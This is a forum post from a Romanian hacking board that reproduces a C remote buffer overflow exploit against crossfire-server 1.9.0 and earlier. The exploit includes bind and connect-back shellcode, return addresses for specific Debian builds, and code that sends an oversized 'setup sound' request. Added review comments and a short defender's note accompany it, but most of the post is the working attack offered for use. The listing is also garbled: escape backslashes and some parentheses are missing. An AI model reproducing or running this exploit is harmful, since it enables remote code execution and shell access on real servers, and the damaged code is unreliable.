Hacking and more... / Exploituri si POCs / crossfire-server <1.9.0 SetUp() Remote Buffer Overflow Exploit (linux) Moderat de Shocker
epic
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

// Defaults: the crossfire-server TCP port the request is sent to (PORT), and
// the port/host that update() patches into the payload placeholders below.
#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host

// Connect-back payload (credited to izik). "HOST" and "PR" are placeholders
// that update() overwrites in place with the caller-supplied address and port.
// NOTE(review): as transcribed on this page the literals are plain ASCII text
// (no escape sequences survived the copy), so this listing does not compile
// or run as shown.
unsigned char sc_cb[] = // izik's
    "x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcd"
    "x80x5bx5dxbeHOSTxf7xd6x56x66xbdPRx0fxcdx09xdd"
    "x55x43x6ax10x51x50xb0x66x89xe1xcdx80x87xd9"
    "x5bxb0x3fxcdx80x49x79xf9xb0x0bx52x68x2fx2f"
    "x73x68x68x2fx62x69x6ex89xe3x52x53xebxdf";

// Bind payload (credited to izik); the default selection (see `sc` below).
// Only the "PR" placeholder is present, so update() skips its host patch for
// this entry.
unsigned char sc_bind[] = // izik's
    "x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcd"
    "x80x5bx5dx52x66xbdPRx0fxcdx09xddx55x6ax10x51"
    "x50x89xe1xb0x66xcdx80xb3x04xb0x66xcdx80x5f"
    "x50x50x57x89xe1x43xb0x66xcdx80x93xb0x02xcd"
    "x80x85xc0x75x1ax59xb0x3fxcdx80x49x79xf9xb0"
    "x0bx68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52"
    "x53xebxb2x6ax06x58xcdx80xb3x04xebxc9";

// Payload table; `-s <index>` in main() selects an entry by position.
// NOTE(review): main() does not range-check that index against this table
// (compare the check it does for targets[]), so an out-of-range -s value
// reads past the end of the array.
struct {
    const char *type;    // label printed by usage()
    unsigned char *code; // payload bytes, patched in place by update()
} shellcodes[] = {
    {"bind",        sc_bind},
    {"connectback",        sc_cb},
};

// Per-build parameters, selected with `-t <index>` (range-checked in main()).
// Each entry is tied to one specific Debian i386 package build, which is why
// the table has to be extended per release.
// NOTE(review): the fixed 0x08xxxxxx addresses suggest non-PIE i386 builds;
// a PIE/ASLR build would invalidate them — confirm against the packages.
struct {
    const char *ver;        // package label printed by usage()
    unsigned long ret; // a "jmp *%eax" instruction — stored at buf[len - 10] by writebuf()
    unsigned short int len; // declared command length: the 2-byte prefix writebuf()
                            // emits; main() then send()s len + 2 bytes
} targets[] = {
    {"crossfire-server_1.6.0.dfsg.1-4_i386.deb",    0x080d6f48, 0x1028},
    {"crossfire-server_1.8.0-2_i386.deb",        0x080506d7, 0x1130},
    {"crossfire-server_1.9.0-1_i386.deb",        0x0807aefa, 0x1130},
    {"crash",                    0xcccccccc, 0x1300},
};

// Element count of a true array (not valid on a pointer parameter).
#define structsize(x) (sizeof x / sizeof x[0])

int s;                       // connected socket: set by establish(), used/closed by main()
int n = -1;                  // selected targets[] index; -1 = unset, rejected by main()
unsigned char *sc = sc_bind; // default shellcode (overridden by -s)
unsigned char buf[0x2000];   // request built by writebuf(); larger than every targets[].len + 2

void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);

// Entry point: parse options, connect to the server, build the oversized
// "setup sound" request in `buf`, and send it.
//   -t target index (required)   -s payload index   -p server port
//   -d / -h port and host patched into the payload; then the hostname.
// Returns EXIT_SUCCESS after send(), EXIT_FAILURE on bad options or a send
// error; establish() and update() exit() on their own failures.
int main (int argc, char **argv) {
    int port = 0; // default value
    unsigned short int sc_port = 0;
    char *sc_host = NULL;

    printf("cf190.c by landser - ihsahn at gmail comnn";

    // NOTE(review): getopt() returns int; storing it in `char` makes the
    // comparison with -1 implementation-defined where char is unsigned.
    char c;
    while ((c = getopt(argc, argv, "t:p:h:d:s:") != -1) {
        switch (c) {
            // NOTE(review): no range check on the -s index (unlike -t below).
            case 's': sc = shellcodes[atoi(optarg)].code; break;
            // strdup() result is not checked; ownership passes to update(), which frees it.
            case 'h': sc_host = strdup(optarg); break;
            case 'd': sc_port = atoi(optarg); break; // atoi() reports no errors; truncated to 16 bits
            case 't': n = atoi(optarg); break;
            case 'p': port = atoi(optarg); break;
            case '?': usage(argv[0]); return EXIT_FAILURE;
        }
    }

    // -t is mandatory and must index targets[].
    if ((n < 0) || (n >= structsize(targets))) {
        printf("invalid targetn";
        usage(argv[0]);
        return EXIT_FAILURE;
    }
   
    // Exactly one positional argument (the hostname) must remain.
    if ((optind + 1) != argc) {
        printf("no hostnamen";
        usage(argv[0]);
        return EXIT_FAILURE;
    }

    establish(argv[optind], port ? port : PORT);
   
    update(sc, sc_port, sc_host);
       
    writebuf();

    printf("> sendingn";

    // Send the 2-byte length prefix plus the declared length, in one call;
    // a short send() is not detected here.
    if (send(s, buf, targets[n].len + 2, 0) < 0) {
        perror("send()";
        return EXIT_FAILURE;
    }
    usleep(100000);

    printf("> donen";
   
    close(s);

    return EXIT_SUCCESS;
}

// Resolve `ip` and connect to it on `port`, leaving the connected socket in
// the global `s`. Exits the process on resolution, socket() or connect()
// failure. Only the first entry of h_addr_list is used.
void establish (char *ip, int port) {
    struct sockaddr_in sa; // never zeroed; only family, port and address are set
    struct hostent *h;

    // gethostbyname() is obsolete and not reentrant; getaddrinfo() is the
    // modern replacement.
    if (!(h = gethostbyname(ip))) {
        herror("gethostbyname()";
        exit(EXIT_FAILURE);
    }
    printf("> resolved %s to %sn", ip,
            inet_ntoa(**((struct in_addr **)h->h_addr_list)));
   
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **)h->h_addr_list);
   
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket()";
        exit(EXIT_FAILURE);
    }

    // sizeof(struct sockaddr) happens to equal sizeof sa for AF_INET;
    // `sizeof sa` would be the clearer spelling.
    if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
        perror("connect()";
        exit(EXIT_FAILURE);
    }

    printf ("> connected to %s:%d.n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}

// Print the command-line synopsis followed by the numbered targets[] and
// shellcodes[] tables (the numbers are the -t / -s indices).
void usage (char *argv0) {
    int i;
   
    printf("usage: %s -t <target> [-s <shellcode>] "
            "[-d <connectback/bind port] [-h <connectback ip>] "
            "host [-p <port>]n", argv0);

    printf("- targets:n";
    for (i=0;i<structsize(targets);i++)
        printf("%d. %sn", i, targets[i].ver);

    printf("- shellcodes: (default 0)n";
    for (i=0;i<structsize(shellcodes);i++)
        printf("%d. %sn", i, shellcodes[i].type);
}

// Patch the payload `code` in place: the 16-bit `port` (SC_PORT when 0) is
// stored over the "PR" placeholder; if the payload also has a "HOST"
// placeholder, the one's complement of `host` (SC_HOST when NULL) parsed as
// an IPv4 address is stored over it. Exits on a port with a zero byte or on
// an unparsable / "255"-containing host. Takes ownership of `host` and frees
// it on return.
void update (unsigned char *code, int port, char *host) {
    if (!port) port = SC_PORT;
   
    // Reject a port whose high or low byte is 0 — presumably because
    // writebuf() copies the payload with strlen(), which would stop at a
    // NUL byte.
    if (!(port & 0xff) || !((port >> 8) & 0xff)) {
        printf("bad cb portn";
        exit(EXIT_FAILURE);
    }
    // Unaligned 16-bit store through a cast (alignment / strict-aliasing UB
    // on some targets), in host byte order; the strstr() result is not
    // NULL-checked.
    *(unsigned short int *)(strstr(code, "PR") = port;

    if (strstr(code, "HOST") {
        in_addr_t inaddr;

        if (!host) host = SC_HOST;
        inaddr = inet_addr(host);
       
        // inet_addr() yields INADDR_NONE (all ones) on error; any "255"
        // substring is also rejected because its complement below is 0x00.
        // The substring test is coarse (e.g. "1.255.0.1" is refused).
        if (inaddr == INADDR_NONE || strstr(host, "255") {
            // ~(255) is 0
            printf("invalid cb hostnamen";
            exit(EXIT_FAILURE);
        }
        *(in_addr_t *)(strstr(code, "HOST") = ~inaddr;
    }
   
    // NOTE(review): when `host` was NULL and was defaulted to the SC_HOST
    // string literal above, this free()s a non-heap pointer (undefined
    // behavior).
    if (host) free(host);
}
   
// Build the request for targets[n] in the global `buf`:
//   [2-byte big-endian length = targets[n].len]
//   ["setup sound "] [120 bytes of 0x90] [payload, up to its first NUL byte]
//   [0x90 filler ...] [targets[n].ret at offset len - 10] [0x90 ...]
// The whole buffer is pre-filled with 0x90 (x86 NOP), so every gap is filler.
// main() then send()s the first len + 2 bytes.
// Defender's note: the declared length (0x1028–0x1300 here) far exceeds any
// legitimate "setup sound" argument; bounding the command length against the
// receiving buffer before copying is the server-side fix, and a "setup"
// command carrying kilobytes of 0x90 filler is a simple wire signature.
void writebuf (void) {
    unsigned char *ptr = buf;
   
    memset(buf, 0x90, sizeof buf);

    // 16-bit length prefix, most significant byte first.
    *ptr++ = (targets[n].len>> 8) & 0xff;
    *ptr++ = targets[n].len & 0xff;
   
    memcpy(ptr, "setup sound ", strlen("setup sound ");
    ptr += strlen("setup sound ";
   
    ptr += 120; // leave 120 nops before the shellcode
    // strlen() stops at the first NUL byte, so the payload must be NUL-free.
    memcpy(ptr, sc, strlen(sc));
   
    // Overwrite slot: `ret` is stored 10 bytes before the end of the declared
    // length. NOTE(review): 4-byte store through a cast assumes a 32-bit
    // unsigned long (i386); on LP64 this writes 8 bytes.
    ptr = &buf[targets[n].len - 10];
    *(unsigned long *)ptr = targets[n].ret;
}



pus acum 18 ani
   
Pagini: 1  

Mergi la